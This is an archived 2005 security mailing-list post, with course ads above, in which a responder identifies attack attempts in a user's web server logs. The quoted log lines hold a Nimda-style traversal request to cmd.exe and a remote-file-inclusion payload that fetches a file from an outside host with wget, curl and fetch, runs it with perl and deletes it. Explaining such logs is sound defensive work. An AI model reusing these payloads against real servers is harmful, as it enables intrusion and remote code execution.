Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Security-Basics
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Fwd: GET //awstats.pl? in apache logs

from [Tobias Hahn] Network Security [Permanent Link]
Subject: Fwd: GET //awstats.pl? in apache logs
Date: Tue, 25 Oct 2005 14:04:40 +0200 
Hi Brad,

On 10/24/05, mail list <brad.maillist@gmail.com> wrote:

2005-10-21 14:18:09 192.168.2.100 GET
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 80 - 66.7.71.83 - 404 0 64

this is some Nimda variant scanning for vulnerable IIS webservers.
http://www.cert.org/advisories/CA-2001-26.html

 I don't know what the second entry is about, but the third entry is
an attempt to use a vulnerability which was reported in the
STADTAUS.com 'Tell a Friend Script' software. As long as you're not
running this software or running the newest version you should be
fine.
http://securitytracker.com/alerts/2005/Mar/1013390.html

Tobias


2005-10-21 02:09:22 192.168.2.100 GET /web-hints/env.cgi - 80 - 58.51.133.21
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 404 0 3

As well as a number of long entries such as the following.

2005-10-23 08:59:10 192.168.2.100 GET /inc/tell_a_friend.inc.php
script_root=http://82.165.168.163/catalog/images/fbi.gif?&cmd=cd%20/tmp;wget
%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20
-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%
20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20s
ess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* 80 - 211.38.128.10
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 200 0 0
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Help writing a back up script, Ralf Allar
Next by Date:  Re: Ecryption Cracking Tools, john
Previous by Thread:  RE: GET //awstats.pl? in apache logs, mail list
Next by Thread:  Re: GET //awstats.pl? in apache logs, S.A. Birl
Indexes:  [Date] [Thread] [Top] [All Lists]